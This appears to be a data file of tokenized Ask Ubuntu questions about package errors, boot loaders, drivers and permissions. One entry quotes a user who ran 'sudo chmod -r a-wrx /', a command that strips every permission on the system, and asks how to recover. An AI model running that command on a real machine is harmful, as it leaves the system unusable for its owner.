265007	ubuntu 12.04 : why does apt-get update fail ?	i can not install any packages for ubuntu 12.04 . even after clearing files under : /var/lib/dpkg/lists/partial/* /var/lib/dpkg/lists/* /var/cache/apt/* changed the repository and tried apt-get clean and all other resolutions provided by ubuntu forums . nothing worked , i had same issue before and reinstalled ubuntu . but that is not the permanent solution . : ~ $ sudo apt-get update 95 % [ 1 sources bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . 98 % [ 2 packages bzip2 0 b ] [ connecting to archive.ubuntu.com ( 91.189.92.201 ) ] bzip2 : ( stdin ) is not a bzip2 file . 100 % [ 6 translation-en bzip2 0 b ] [ waiting for headers ] 154 b/s 0sbzip2 : ( stdin ) is not a bzip2 file . fetched 5,722 b in 14s ( 403 b/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead . hope ubuntu developers should definitely know the quick workaround to fix this . this is a very common issue for all ubuntu users which is unsolvable . kindly create a global faq answers to fix this issue .
265008	pidgin after source compilation not working	i have downloaded the pidgin source code from the following location . http : //www.pidgin.im/download/source/ after compilation , when i run the pidgin , i do n't see any option for im sites ( like facebook , gtalk.. etc ) . i have attached a screen shot to show the issue . please help as it is showing in screen , there is no option coming in protocol drop down list .
265009	.lock file not getting removed when starting cyrys	when ever i trid to restart cyrus-imap service its showing lock files of the users . root @ mail3 : ~ # /etc/init.d/cyrus-imapd restart * restarting cyrus imapd cyrmaster /var/lib/cyrus/lock/domain/s/sonu.com/s/user/sonu.lock [ ok ] my server configurations are ubuntu 12.04 lts and cyrus-2.4 .
265010	how do i edit grub menu	i have a dual boot on my computer of windows 7 and xubuntu 12.10 . the linux boot is 1st and the windows 2nd . i would like to reverse the boot order in the grub menu . i need to know the steps to go about editing grub.i do most of my work on windows and need it to be 1st so i can boot up and not watch it .
265013	how can i change my boot options from within windows 7 ?	i installed ubuntu alongside windows 7 , however when i boot it up , it gives me graphic issues and will not proceed . i can fix it by adding nosplash nomodeset to the parameters , but i do n't know how to do that since it 's alongside windows 7 . the ubuntu files are in my c : / drive , but i do n't know which file to edit . can someone help me ?
265016	is my dell inspiron n5050 laptop compatible with xubuntu 12.10 ?	xubuntu-12.10-desktop-amd64 does n't boot in live usb mode . only the boot screen appears and then it stops . my laptop is already running ubuntu 12.04 , and since xubuntu 12.10 live usb boot only shows the boot logo , can xubuntu be incompatible with my dell inspiron n5050 laptop ? hardware overview processor intel ( r ) pentium ( r ) cpu b940 @ 2.00ghz video intel corporation 2nd generation core processor family integrated graphics controller network atheros communications , inc. ar3011 bluetooth network realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller video intel corporation 2nd generation core processor family integrated graphics controller
265025	how to change default file/folder permission of specific user ?	how can i make any folders or files created by a certain user always be public ( accessible by anyone ) in ubuntu ?
265028	apt-cacher-ng : force client on local repository	i 'm currently managing a dozen servers . apt-cacher-ng is installed on the development server to maintain the packages . the idea is to have exactly the same version and number of packages on the production servers . we first make the update/upgrade on the dev server , then after validating the install ( which can take a few hours or a day ) , we make the same on the production servers . the problem is that between the time we make the update on the dev and on the production server , versions of packages may have changed so production servers wo n't get the same version of the packages . can i force the clients ( production servers ) to sync with the dev server , and not retrieve newer packages on the internet ? or , is there any clever automated way to make sure my clients are in sync with the dev server ? thanks for reading . edit : found this link : debian-administration.org : cloning a debian system - identical packages and versions . it partially solves my problem , but i 'm still looking for an answer with apt-cacher-ng or else .
265030	ssh bootstrap nodes	after a successful juju bootstrap , still to figure out how to ssh the nodes . the reason for this is because the juju status command shows that agent-state is not started in two nodes also with instance-state : unknown ! ! ! it seems that integration of the juju zookeeper ca n't be established . disabling the firewall is also another alternative as was proposed in askubuntu juju stuck in `` pending '' state when using lxc looking for a way to ssh to the bootstrap node and dig around in /var/log/zookeeper to figure out the missing part . basically , an alternative to do so is to play with file : /var/lib/cobbler/kickstart/maas.preseed and change line : d-i passwd/user-password-crypted password ! with : d-i passwd/user-password-crypted password encrypted_password then , bootstrap the machine and login with ubuntu/password [ set in the conf file ] the question is that the last file does not exist in maas and juju installation . i saw cobbler in my setting files [ boot server . for more information about it cobbler setting . what s the role of cobbler with maas/juju and is it required to ruin zookeeper ? if not , how to ssh the nodes without playing with last trick showed above ? thanks for any information shared : - )
265031	wired connection issue	i have recently installed ubuntu 12.10 on my lenovo g580 series had an issue with the ethernet this was solved after installing atheros network driver . the laptop was working fine and able to do browsing , but after installing the updates ( around 200mb ) the problem started again wired detecting but unable to connect to it . please look into this .
265040	counting route changes with ping tool	i am busy doing mesh testbed work , and i am evaluating the performance of this network by the use of several metrics . one of these is the amount of route changes the protocol performs . i note that the ping tool which i am using allows for route changes to be displayed during execution , but this requires me to manually look through screels of output in order to count the number of route changes . is there an easier way to do this ? should i pipe the output into a parser of some kind perhaps ? regards
265044	problem with screen resolution on installing ubuntu in lenovo ideapad z580 ?	i am using lenovo z580 ideapad . first when i try to install ubuntu it was always displaying a black screen with things like no sdisk found displayed on it . when i changed graphics to uma i was able to install ubuntu but on booting my screen is filled with lots of small squares with cursor . i am not able to do any thing in this . what is wrong with my graphics settings what do i need to do to fix them ?
265045	ubuntu 12.10 ca n't boot on hp mini 210-4000 and brightness problem	i 've problem installing ubuntu 12.10 on my hp mini 210-4000 notebook with spec intel atom 2800 and intel gma 3600 , after installation finish , and rebooting , the grub bootloader appear without any text just only purple background and then enter to the ubuntu with black blank screen . after that i 'm trying installing ubuntu 11.10 and succesfully to the home screen but the brightness ca n't be configured . how to figure this out ? thanks in advance .
265050	403 error on php - lighttpd	i have set up the fastcgi properly , unhashed it from the module.conf , [ root @ xlh lighttpd ] # service lighttpd status redirecting to /bin/systemctl status lighttpd.service lighttpd.service - lightning fast webserver with light system requirements loaded : loaded ( /lib/systemd/system/lighttpd.service ; disabled ) active : failed execstart=/usr/sbin/lighttpd -d -f /etc/lighttpd/lighttpd.conf ( code=exited , status=255 ) cgroup : name=systemd : /system/lighttpd.service [ root @ xlh lighttpd ] # php-cgi -v php : syntax error , unexpected ' & ' in /etc/php.ini on line 113 php 5.3.18 ( cgi-fcgi ) ( built : oct 18 2012 07:07:56 ) copyright ( c ) 1997-2012 the php group zend engine v2.3.0 , copyright ( c ) 1998-2012 zend technologies with xdebug v2.1.4 , copyright ( c ) 2002-2012 , by derick rethans when i go to localhost/index.php it throws a 403 error . any idea why ?
265055	unable to run oracle applet on firefox browser	my users are currently on ubuntu 10.04 . we are unsing oracle application server on our server . the problem is we are unable to run oracle applet on firefox browser . i did all the r & d , created soft links but failed . please help me in this reagard , thanks .
265057	dash search results not showing my files	i am using the dash search to find files ( mostly video files ) but its only displaying recently played files.my files are in a different partition , and yes i have mounted those drives.how do i get the dash search to index these drives and show results from them.any help is greatly appreciated : d
265058	media keys disable external monitor	recently on my dell xps m1330 with ubuntu 12.10 , after some updates ( i could not figure out which one caused the problem ) , if i press the media keys on the keyboard or the remote control , they turn off the external monitor connection ( like pressing the fn+f8 keys ) . when the external monitor is off , the media keys work properly . i have a backup , but restoring it would be time consuming and might not solve the problem . i would like to hear any suggestion about how to recover media keys functionality . thanks in advance .
265060	issues with installing ubuntu next to windows 8	i 've tried installing ubuntu 12.10 via wubi on my windows 8 computer . the computer used to have windows 7 , but i upgraded it and made a clean install . now when i choose ubuntu in the windows boot manager i get a black screen with an error message . i can still boot to windows 8 . can anyone help me ? i 'm kinda new to this !
265066	why i can not install google chrome ?	i am in ubuntu 12.04 lts 32bit environment , and if i want to install chrome ( 32bit ) , the system would inform me that : yao @ yao-thinkpad-x220 : ~/download $ sudo dpkg -i google-chrome-stable_current_i386.deb [ sudo ] password for yao : dpkgďźsolve google-chrome-stable_current_i386.deb ( -- install ) errorďź google-chrome-stable : 22.0.1229.92-r159988 ( multi-arch : no ) is not co-installable with google-chrome-stable : amd64 22.0.1229.92-r159988 ( multi-arch : no ) which is currently installed i promise i never installed any chrome . i also try to remove chrome but the ubuntu system tells me that it can not find chrome . so , please help me , thanks .
265067	apt get is not working unmet dependencies	i tried installing the packages as below apt-get install libcurl4-gnutls-dev libexpat1-dev gettext \ libz-dev libssl-dev then i got this error root @ ip-10-233-139-125 : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : openmrs suggested packages : tomcat6-admin lcab cabextract the following new packages will be installed : openmrs 0 upgraded , 1 newly installed , 0 to remove and 137 not upgraded . 1 not fully installed or removed . need to get 0 b/34.1 mb of archives . after this operation , 34.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! openmrs install these packages without verification [ y/n ] ? y dpkg : error processing /var/cache/apt/archives/openmrs_1.6.1_all.deb ( -- unpack ) : unable to open file '/var/lib/dpkg/tmp.ci//.svn ' : is a directory no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/openmrs_1.6.1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) then i tried root @ ip-10-248-109-175 : ~ # sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of sana : sana depends on openmrs ; however : package openmrs is not installed . dpkg : error processing sana ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : sana i removed the directory sana in /opt/ as i do n't want that . i tried some other
265072	ubuntu linux 12.10 message of the day	i 've just made the transition to ubuntu linux 12.10 and i want to properly set up my first motd . i 've run the following below and noticed that i only have one motd file instead of having a secondary file called motd.tail that most ubuntu versions seem to have . should i create backup copy the motd file and then write to that file , or write to the file directly ? also , once i 've written to this file do i need to make it executable to display the message ? ls -l motd* // output : motd - > /var/run/motd
265079	how can i install specific version of mysql	i 'm trying to install mysql-server 5.0. because i want to install a program which depend on this version . i 've surfed the net to find a solution but none of them worked . i 'm really disappointed . i tried `` apt-get install mysql-server=5.0.96-0ubuntu3 '' but it said `` version '5.0.96-0ubuntu3 ' for 'mysql-server ' was not found '' . i found this package at http : //packages.ubuntu.com/hardy/mysql-server-5.0 but i do n't know how to use it . is it a way that i can install it manually ? please help me !
265080	how can i recover from chmod -r a-wrx / command ?	today i ran sudo chmod -r a-wrx / . now nothing is working . can anyone help me recover my system ?
265083	how to export/save evolution contacts as seperate .vcf files ?	is there any command or short-cut for saving evolution contacts as separate .vcf files rather than a list.vcf in ubuntu 10.04 ?
265084	brasero will not blank my dvd , cd , rw 's	using ubuntu 12.10 and i cant erase any of my dvd , or cd rw 's . terminal will not work either . i have tried all the force commands in terminal and nothing . the dvd is recognized as a rewritable disk so i do n't know why its not working . when i open brasero i have no `` menu '' to shoose blanking from . the data on the disk that i want to blank has some backup from windows 7 is that why brasero will not blank it ? i know longer have windows 7 , ubunto is my only os . i want to put lynux mint on this dvd .
265086	start plasma-desktop with parameters	is it possible to start plasma-desktop after login with parameters ? e.g . if i want to try my optimus : dri_prime=1 plasma-desktop and if so , how can i show if the nvidia card is used ?
265087	can i suggest some new feature to next edition of ubuntu ?	i 'm not developer , just regular user . i just like to see new feature on the next version of ubuntu . i want to suggest new feature , can i do that ?
265088	12.04.2 lags when i have 4gb ram	i have ubuntu 12.04.2 lts the newest version and it lags some times i have it running on a external drive wd book with 500 gb and the computer i have it hooked up to is a optiplex 755 with 4gb of ram help me thanks and what are the ram requested
265091	booting multiple ubuntu 's in a system	i having ubuntu 11.10 , windows7 and windows8 installed for now . i also want to install ubuntustudio . i have tried installing it into a separate partition . but , that did not load . only the ubuntu 11.10 ( with windowsloader [ windows7 & windows8 ] ) loads . the newly installed ubuntustudio ( based on ubuntu 12.04 ) does n't load up . the installation went successful . how am i supposed to load that also ?
265095	is there a trash explorer to explore and restore .trash- $ uid contents ?	i work with external storage and mounts a lot , and i often end up with a .trash directory somewhere , whose contents are not shown in the file manager trash bin , even though .trash/files contains a lot of files . the whole hierarchy in .trash/files is changed compared to the original parent directory , and a lot of files appear to have duplicates . so i ca n't just mv the contents back to the original directory . i was wondering if there is some kind of 'trash explorer ' that lets you see the trash for specific trash directories in it 's original hierarchy and lets you restore portions as such . this time , a memory drive that ubuntu one was using , stopped working . the mount-bind was suddenly empty . ubuntu one proceeded to delete gigabytes of thousands of files on all my computers that shared this directory , luckily putting all the files in a .trash directory locally . i say again , nautilus/nemo does not show this trash , and neither does trash-list , yet it is filed with files , info and files.u1conflict courtesy of ubuntu one .
265097	how to get 12.10 fix for pdf printing problem ( where some pages print blank ) in 12.04 ?	as documented on launchpad , there is a bug for ubuntu 12.04 somewhere in the pdf printing stack . this bug causes some or all pages of the pdf to print blank . since this issue does n't occur in ubuntu 12.10 , it seems no one is interested in fixing the issue on ubuntu 12.04 . this is a serious issue for me . my job requires me to print many pdfs sent to me by other people , some of which are effected by this bug ( none of the pdfs i create in ubuntu are effected by this issue ) . my current workaround is to open every single file in adobe 's pdf reader in windows and print them to ... wait for it ... pdf . other than being a huge waste of time , i extremely dislike having to use these two pieces of proprietary software to avoid this bug . how can i get the fix in ubuntu 12.10 for this bug in ubuntu 12.04 ?
265098	can i restore gpg password from backup key ?	i 've forgot my gpg password . but i have a backup of private key . can i restore my password from backup file of secret key ?
265102	how can i fix port conflicts between apache tomcat ( 8080 ) and default http ( 8080 ) ?	i am using ubuntu 12.10 , and in eclipse i 've to run the php scripts and c/c++ codes , but when i am starting synchronization of tomcat 7 server it shows the error as , '' several ports ( 8005 , 8080 ) required by tomcat v7.0 server at localhost are already in use . the server may already be running in another process , or a system process may be using the port . to start this server you will need to stop the other process or change the port number ( s ) . '' how do i fix it ? please help me..
265104	installing cunit on ubuntu quantal	i 'm trying to install the cunit ( c unit testing framework ) packages on quantal ( 64bit ) . cunit seems to be held in a number of packages , but according to apt-get these are broken . attempt 1 : $ sudo apt-get -f install libcunit1-* reading package lists ... done building dependency tree reading state information ... done note , selecting 'libcunit1-ncurses ' for regex 'libcunit1-*' note , selecting 'libcunit1-dev ' for regex 'libcunit1-*' note , selecting 'libcunit1-doc ' for regex 'libcunit1-*' note , selecting 'libcunit1 ' for regex 'libcunit1-*' note , selecting 'libcunit1-ncurses-dev ' for regex 'libcunit1-*' some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libcunit1-ncurses : conflicts : libcunit1 but 2.1-0.dfsg-10 is to be installed libcunit1-ncurses-dev : conflicts : libcunit1-dev but 2.1-0.dfsg-10 is to be installed e : unable to correct problems , you have held broken packages . attempt 2 : $ sudo apt-get -f install 2.1-0.dfsg-10 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package 2.1-0.dfsg-10 e : could n't find any package by regex '2.1-0.dfsg-10' any ideas ?
265105	compizconfig settings manager does not select or deselect any plugin	i just activated the rotating cube in my compizconfig settings manager but now i ca n't select any other plug-in or even disable the ones that are running . the enable/disable button is just a bit gray like its not active ... please help .
265111	install a single specific package from future distribution	i 'm currently using precise . i need to upgrade a certain package ( namely bind9 and it 's dependencies ) to a newer version , which is currently found in raring ( alfa at the time of writing this ) . how to do it ? what will happen if i just add to my sources.list : deb http : //archive.ubuntu.com/ubuntu raring main will the next apt-get update / apt-get upgrade , upgrade most of my system to raring then ?
265112	using last part of command for next command	when using the command i know a friend of mine who used to re-use last part of previous command . he unfortunately moved far away and i ca n't get hold of him . first : cp -r folder ~/folder then he was re-using ~/folder in a very quick way . anyone who knows how to do this ?
265122	fix ugly bold fonts in firefox 18+	i am using firefox 19 at the moment . as of firefox 18 or even earlier , i noticed that bold fonts on some pages look horrible and unreadable . for example , go to this link . in my firefox 19 , the page looks like this how can i fix this so that those unreadable fonts become readable again ? i guess the ubuntu is in some kind of collision with ttf or similar fonts .
265125	which flavor of ubuntu is best for p4 without graphics card ?	i have an old computer with following configuration : 3.0 ghz intel pentium 4 processor 2gb ddr2 ram 320 gb hard disk without any graphics card . which flavor of ubuntu would be better suited for this configuration ?
265130	how to disable ctrl + alt + del in unity	i have ubuntu 12.04 lts and i want to disable the ctrl+alt+del shortcut because it interferes with the same shortcut in my virtualbox 's windows . how can i do this ? i tried to remove it from keyboard shortcuts in settings but it did n't help .
265132	why does n't ubuntu 12.04 recognize my windows 7 partition ?	after some problems trying to install ubuntu alongside windows 7 , now i have windows 7 installed and it works just fine . but when i am going to install ubuntu it does n't recognize my windows . what should i do to see ubuntu in my pc ? my ubuntu version is 12.04 64 bit . pc specs : asus crosshair iv formula amd phenom ii x6 1055t @ 4.1ghz corsiar 4x2gb 1766 @ 9-9-9-24 amd radeon 7870 ghz edition wd 1tb caviar black
265133	bash script : is it possible to recognize video format from files ( to batch extract audio from them ) ?	i have written a little bash script to extract audio from video files in batch mode . sound is extracted from each mp4 file to flac format using avconv ( and the flac codec ) . # ! /bin/sh # # batch conversion of audio extraction from video folder_src= '' /home/me/music/testbatchconv '' for myvid in $ ( find $ { folder_src } | grep mp4 ) do avconv -i $ myvid -acodec flac `` $ { myvid } .flac '' done exit 0 it works fine , but i would like to improve it . the script only detects mp4 format . is it possible to recognize a video file with a command ( instead of testing each video format ) ? thank you for advices .
265134	how to remove performance lags while playing ragnarok on wine ?	i have just installed wine and playonlinux . its performance is very lagging when i run the game ( ragnarok ) and type my username and password . how can i improve the performance and remove any performance lags ?
265139	multi-user disk-less workstation using beyond trust powerbroker identity services open edition ( formerly likewise )	i am attempting to create a multi-user disk-less workstation environment where all workstations will use the same image from the same tftp boot server and use windows active directory log-in credentials . it appears that multiple local users can log in from 2 or more stations without any issues . however , when using active directory credentials logging in to the second workstation breaks the connection to the domain controller . apparently there are some files being shared and clobbered . there are some sockets in /var/lib/pbis that i imagine are critical . i assume i need to isolate shared files in a tmpfs . is a multi-user disk-less active directory workstation environment achievable ? if so do you have any recommendations on how to prevent the active directory connection from breaking ? i am using : ubuntu 12.10 lubuntu desktop pbis open 7.0.6.935 - stable release
265146	installing nvidia geforce 9 driver using the installer i got from their website	in my ubuntu 12.10 it did n't detect my graphic card . when i check the graphics in system settings > details it says none i 've downloaded my driver installer from the nvidia website , make it executable , then it ran but it say i does n't install on a x server.. i read in a blog that i have to download drivers via the software center called jockey . after the installation i could n't find my driver in the list..plus the problem it mentioned if i messed up then it will mess up my boot . ca n't i just use the file i got from nvidia to install it ? speaking of which is it necessary here since i do n't play games here and would go for vmware and install my old windows os there and play the game there instead . thanks
265147	permission denied !	two questions : ( 1 ) i 've just installed ubuntu 10.04.2 on my mac pro and i 've also installed clam and avg virus apps . when i scan my home folder clamscan works fine but with avgscan ~/ i get `` /home/ron object scan failed ; permission denied . '' ( 2 ) i have a folder /media/ubuntu_data which i created in os x . in ubuntu i have a couple of files in my download folder which i ca n't drag into this folder . i get `` error while copying to ubuntu_data . the destination is read only . i 've tried chmod on this folder and i ca n't get it to work .
265149	aptitude depends	how do i fix this ? i also did sudo apt-get -f install but same error the following packages have unmet dependencies : aptitude : depends : libapt-pkg4.12 ( > = 0.8.16~exp12ubuntu6 ) but it is not installed depends : libboost-iostreams1.46.1 ( > = 1.46.1-1 ) but it is not installed depends : libept1.4.12 but it is not installed depends : libstdc++6 ( > = 4.6 ) but 4.4.3-4ubuntu5.1 is installed depends : libtinfo5 but it is not installed depends : libxapian22 but it is not installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies
265150	unity is gone after uninstalling webapps ?	i removed the package apt-get remove unity-webapps-facebook . after restarting , nothing but my desktop icons show . the top menu , and the leftside one is gone . opening the terminal with ctrl+alt+t , and typing unity tells me it 's been uninstalled .
265151	sample application built with quickly ca n't access web	i am running tutorial application example for quickly ( i named app smallbrowser ) . this is code from smallbrowserwindow.py : import gettext from gettext import gettext as _ gettext.textdomain ( 'smallbrowser ' ) from gi.repository import gtk , webkit # pylint : disable=e0611 import logging logger = logging.getlogger ( 'smallbrowser ' ) from smallbrowser_lib import window from smallbrowser.aboutsmallbrowserdialog import aboutsmallbrowserdialog from smallbrowser.preferencessmallbrowserdialog import preferencessmallbrowserdialog # see smallbrowser_lib.window.py for more details about how this class works class smallbrowserwindow ( window ) : __gtype_name__ = `` smallbrowserwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( smallbrowserwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutsmallbrowserdialog self.preferencesdialog = preferencessmallbrowserdialog # code for other initialization actions should be added here . self.refreshbutton = self.builder.get_object ( `` refreshbutton '' ) self.urlentry = self.builder.get_object ( `` urlentry '' ) self.scrollwindow = self.builder.get_object ( `` scrollwindow '' ) self.webview = webkit.webview ( ) self.scrollwindow.add ( self.webview ) self.webview.show ( ) def on_refreshbutton_clicked ( self , widget ) : print `` refresh '' def on_urlentry_activate ( self , widget ) : print urlsite urlsite = widget.get_text ( ) self.webview.open ( urlsite ) so when i run smallbrowser and write desired url i got this error on webkit canvas : unable to load page problem occurred while loading the url http : //www.google.com/ can not resolve proxy hostname ( ) i do n't understand where is my mistake .
265152	12.04 hp notebook becomes very hot	i have installed ubuntu 12.04 lts on my hp pavillion dv6 1330er . and when i work with text editor or some other programs , it becomes very hot , but processor works between 10 % . how can i solve this problem ? install some softwares or what ? please help me !
265155	a juju charm that configure dependencies to work with jenkins	i 'm doing a charm that installs jenkins and stuff . if the user already have an account on github and create a new repository named `` builder '' , he can put the dependencies for the job as app engine , gwt ... and can still put a bash script for installation of other dependencies or even organization of folders . it can also be placed a config.xml file that would create the job in jenkins . so no need to get into the machine to make such configurations . i wonder if this charm would be useful for the community ? thanks ! edit - i already know the jenkins charm , but it just install jenkins and nothing more than that . so our needs were to automatize all the environment configuration without enter in machine to make the enviroment . based on charm jenkins we modified to pull a repository named builder from github and there you can put a bash script to install dependencies that the charm runs and a config.xml with the jenkins job that will be created . for our projects this facilitates the jenkins configuration so we can just change few parameters to deploy it . we already try to use this function to install scripts but we had some problems with that and using a repository you are able to change somethings without having to deploy a charm in any alteration .
265158	bumblebee not working anymore after installing the new nvdia drivers	i had managed to make bumblebee work yesterday and today i launch update manager and i see some new nvidia drivers . i dont know why but i installed them ... i shouldnt have done that lol now im back with this classic error [ 84.300183 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 84.300310 ] [ error ] aborting because fallback start is disabled . of course i 've googled it before , there are so many threads about this problem but i couldnt find a solution . ive blacklisted nouveau , i tried to blacklist nvidia in the conf , driver=nvidia and kerneldrive=nvidia too i dont know what to do anymore i am thinking about removing linux and going back to 7 , its so hard its so exhausting please help
265159	how to find *why* i ca n't bind some keyboard shortcut ( or which app took it ) ?	in short : is there ( under unity ) any way to find out which application grabbed some global shortcut ? i do not ask for `` standard shortcuts '' but for some way to get information about actual shortcuts ( which app is actually keeping given key just now in my current config ) longer story : i have repeatable problems with managing keyboard shortcuts . at the moment : synapse sometimes ( * ) ca n't bind win-space as it 's activation shortcut , reporting `` failed to register hotkey 'activate ' with signature 'space ' '' ( what usually means that this shortcut is already taken ) ( * ) after one login it works , after another login it does not . i suspect some race between two apps… f9 for some reason makes my screen slightly darker ( and f9 does not reach application-level shortcuts so for example my byobu menu does not work ) i tried looking at various places , and : i do not see any of those shortcuts in keyboard settings/shortcuts i ca n't find them in gconf-editor ( i tried searching for f9 in values in particular , nothing found ) i could not find them in dconf-editor ( there is no search so i clicked some most obvious paths ) so my question is : is there any way to ask unity/dconf/gconf/d-bus/whatever about current global hotkeys allocation ( which process is keeping which key ) . or force logging those allocations to some log file . or grep them from somewhere . or………
265167	why can a new user not write to external hard drive ?	i installed precise pangolin using this guide . i created a user account for my wife and a guest account . i formatted and mounted an external hard drive to the server . i created several file shares using webmin as per the guide . all file shares are set to writable ; with valid users : myself and wife ( some also have guest as valid user ) . i was initially unable to write to any share with any account . i ran chown -r /directory/to/myshare ( using the correct directory path of course ) and was able to write to the specific share with my account . i set file permissions to 775 ( in webmin ) and am still unable to write using wife account . accounts are under group : users . what else can i try to allow wife account to write ?
265171	'indicator-cpu ' wo n't start , what is wrong ?	working with 12.04 desktop version although gui is disabled . when i try to launch indicator-cpufreq i get this error : /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could n ot open display warnings.warn ( str ( e ) , _gtk.warning ) ** ( indicator-cpufreq:4955 ) : warning ** : command line `dbus-launch -- autolaunch= 13d2f8aab40f0bc001c139be00000007 -- binary-syntax -- close-stderr ' exited with non -zero exit status 1 : autolaunch error : x11 initialization failed.\n /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:54 : gtkwarning : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed appindicator.category_hardware ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:54 : warning : inv alid ( null ) pointer instance appindicator.category_hardware ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:54 : warning : g_s ignal_connect_data : assertion `g_type_check_instance ( instance ) ' failed appindicator.category_hardware ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:61 : warning : inv alid ( null ) pointer instance menu = gtk.menu ( ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:61 : warning : g_s ignal_connect_data : assertion `g_type_check_instance ( instance ) ' failed menu = gtk.menu ( ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:73 : gtkwarning : ia__gtk_settings_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed menu_item = gtk.radiomenuitem ( group , readable_frequency ( freq ) ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:73 : warning : g_o bject_get : assertion `g_is_object ( object ) ' failed menu_item = gtk.radiomenuitem ( group , readable_frequency ( freq ) ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:87 : gtkwarning : ia__gtk_settings_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed menu_item = gtk.radiomenuitem ( group , readable_governor ( governor ) ) /usr/lib/python2.7/dist-packages/indicator_cpufreq/indicator.py:87 : warning : g_o bject_get : assertion `g_is_object ( object ) ' failed menu_item = gtk.radiomenuitem ( group , readable_governor ( governor ) ) ( indicator-cpufreq:4955 ) : libappindicator-warning ** : unable to get the session bus : command line `dbus-launch -- autolaunch=13d2f8aab40f0bc001c139be00000007 -- b inary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch erro r : x11 initialization failed.\n ( indicator-cpufreq:4955 ) : libdbusmenu-glib-warning ** : unable to get session bus : command line `dbus-launch -- autolaunch=13d2f8aab40f0bc001c139be00000007 -- bina ry-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n /usr/bin/indicator-cpufreq:82 : gtkwarning : screen for gtkwindow not set ; you mus t always set a screen for a gtkwindow before using the window gtk.main ( ) /usr/bin/indicator-cpufreq:82 : gtkwarning : ia__gdk_screen_get_display : assertion `gdk_is_screen ( screen ) ' failed gtk.main ( ) /usr/bin/indicator-cpufreq:82 : gtkwarning : ia__gdk_keymap_get_for_display : asser tion `gdk_is_display ( display ) ' failed gtk.main ( ) /usr/bin/indicator-cpufreq:82 : warning : invalid ( null ) pointer instance gtk.main ( ) /usr/bin/indicator-cpufreq:82 : warning : g_signal_connect_data : assertion `g_type _check_instance ( instance ) ' failed gtk.main ( ) my question is simply , what does this mean ? is there a way to fix it ?
265176	how to convert a video from mp4/flv to mpeg/mpg	i download videos in mp4 or flv format but i need to convert them to mpeg 1/2/3 so that i can watch them on my special gadget . i think i need a program . any suggestion thanks
265179	grub menu opens on boot	just recently , i installed ubuntu on my laptop . i am dual booting ubuntu along side of windows 7 , in which ubuntu is dedicated 22 gb and windows is dedicated the rest . so like the normal startup , you select either ubuntu or 7 and the os 's boot is launched from there . however , within the last couple of days , when i select ubuntu to boot with , it opens a grub menu . here are the commands i 've tried to enter in sequence , which was unsuccessful . grub > ls grub > set root= ( hd0 , msdos3 ) grub > linux /vmlinuz ro root=/dev/sda1 `` file /vmlinuz not found . '' grub > initrd /initrd.img `` you must load the kernel first . '' grub > boot `` you must load the kernel first . '' i obtained this list of commands from an outside website , and honestly have n't really ever used grub before , so i do n't really know what i 'm doing . especially considering i 'm not quite familiar with linux yet . so please try to dumb it down for me if you can . so basically two questions come up : what happened to /vmlinuz and how do i load the kernel ? thank you in advance .
265184	is it possible to run ubuntu on a asus padfone 2 at the moment ?	is it possible to run ubuntu on a asus padfone 2 at the moment ? if possible please let me know how to make it work !
265190	change files permissions	i would like to know how to change permissions for all my files . i do n't understand why some come with ''read '' only ... i 'm the only one that uses the pc , so the max permissions would be good ! i ran the command chmod go+r * but just made everything readable only ... help guys ? i want to read , write and execute all my files .
265192	how do i install vmware player ( from a .bundle file ) ?	i downloaded vmware player 5.0.1 , it comes in a file with .bundle extension . how do i install it ?
